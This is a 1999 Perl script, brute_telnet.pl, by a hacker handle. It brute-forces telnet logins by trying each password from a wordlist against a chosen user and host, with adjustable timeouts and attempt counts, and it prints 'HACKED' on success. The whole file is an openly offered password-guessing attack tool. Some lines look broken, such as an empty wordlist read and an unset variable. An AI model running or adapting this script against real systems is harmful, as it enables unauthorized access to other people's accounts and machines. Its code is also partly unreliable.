#!/usr/bin/perl # brute_telnet.pl - brute force login through telnet using treated wordlists # by obecian # 8/23/99 # NEW!! - Select # of seconds in telnet login timeout, fine tune your hack! # Select # of attempts # Greetz to: # bind [BSD ownz j00!] # cripto [they can't catch me... i'm the gingerbread man!] # GhettoHackers [40 oz to phear] use Socket; use Net::Telnet; # network timeouts my $MAX_SOCKET_TIME = 2; my $MAX_CONNECT_TIME = 3; # usage info my $HELP = qq(brute_telnet.pl - obecian \(c\)1998-99\nUsage: bruteforce.pl [-h | --help] [-d | --debug] [-t | --timeout seconds] [-a | --attempts num] user hostname wordlist\n); my ($user,$victim,$wordlist); my $timeout = 10; my $attempts = 3; my $DEBUG = 0; while($_=shift){ if(/^--(.*)/) { $_=$1; if(/help/) { print $HELP; exit(0); } if(/debug/) { $DEBUG=1; } if(/timeout/) { $timeout=shift; } if(/attempts/) { $attempts=shift; } } elsif(/^-(.*)/) { $_=$1; if(/^h/ or /^\?/) { print $HELP; exit(0); } if(/^d/){ $DEBUG=1; } if(/^t/){ $timeout=shift; } if(/^a/){ $attempts=shift; } } else { $user = $_; $hostname = shift; $wordlist = shift; } } if ($user eq "" || $wordlist eq "" || $wordlist eq "") { print $HELP; exit(0); } # open dictionary for reading open(DICT, "< $wordlist") or die "Error: $!"; my($proto,$port,$sin,$ip); print "Trying $hostname\n" if($DEBUG); local $SIG{'ALRM'} = sub { exit(0); }; alarm $MAX_SOCKET_TIME; $proto = getprotobyname('tcp'); $port = 23; $ip = inet_aton($hostname); if (!$ip) { print "Could not find host\n" if($DEBUG); exit(0); } $sin = sockaddr_in($port, $ip); socket(SOCK, PF_INET, SOCK_STREAM, $proto); alarm $MAX_CONNECT_TIME; if(!connect(SOCK, $sin)) { exit(0); } my $iaddr = (unpack_sockaddr_in(getpeername(SOCK)))[1]; close(SOCK); # something is listening on port 23 print "listen $victim\n" if($DEBUG); alarm 0; $hostname = gethostbyaddr($iaddr,AF_INET); my $guess; my $ptr=0; my @namespace = ; #while ($guess = ) { while (1) { # create new telnet conenction w/10 second timeout $t = new Net::Telnet (Timeout => $timeout, Prompt => '/[\$%#>)] /', Errmode => sub { return; }); if (!$t) { print "ACCESS DENIED!\n"; exit(0); } for ($i=0; $i<$attempts; $i++) { $guess = $namespace[$ptr]; $ptr++; chop $guess; if ($guess eq "") { print "Wordlist exhausted... try another\n\n"; exit(0); } print "$user\@$hostname: $guess\n"; $t->open($hostname); $t->login(Name => $user, Password => $guess); my (@data) = $t->get(); if (@data != NULL) { print "HACKED\n\n"; print "End of Line.\n"; exit(0); } } }